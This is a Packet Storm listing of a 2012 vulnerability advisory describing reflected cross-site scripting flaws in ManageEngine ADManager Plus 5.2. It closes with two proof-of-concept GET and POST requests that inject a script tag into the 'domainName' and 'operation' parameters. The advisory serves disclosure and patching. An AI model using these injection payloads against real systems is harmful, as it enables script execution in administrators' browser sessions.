ManageEngine ADManager Plus 5.2 Cross Site Scripting

2012-02-07T00:00:00
ID PACKETSTORM:109528
Type packetstorm
Reporter LiquidWorm
Modified 2012-02-07T00:00:00

Description

                                        
                                            `  
ManageEngine ADManager Plus 5.2 Multiple XSS Vulnerabilities  
  
  
Vendor: Zoho Corporation Pvt. Ltd.  
Product web page: http://www.manageengine.com  
Affected version: 5.2  
  
Summary: ADManager Plus is a simple, easy-to-use Windows  
Active Directory Management and Reporting Solution that  
helps AD Administrators and Help Desk Technicians with  
their day-to-day activities.  
  
Desc: ADManager Plus suffers from multiple XSS vulnerabilities  
when parsing user input to the 'domainName' parameter in the  
'/jsp/AddDC.jsp' script via GET method and 'operation' parameter  
in the '/DomainConfig.do' script via POST method. Attackers can  
exploit these weaknesses to execute arbitrary HTML and script  
code in a user's browser session.  
  
Tested on: Microsoft Windows XP Professional SP3 (EN)  
Apache-Coyote/1.1  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2012-5070  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5070.php  
  
  
06.02.2012  
  
---  
  
#1  
  
- GET http://localhost:8080/jsp/AddDC.jsp?domainName="><script>alert('zsl')</script> HTTP/1.1  
  
  
#2  
  
- POST http://localhost:8080/DomainConfig.do?methodToCall=save HTTP/1.1  
  
- DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation="><script>alert('zsl')</script>&reset=  
`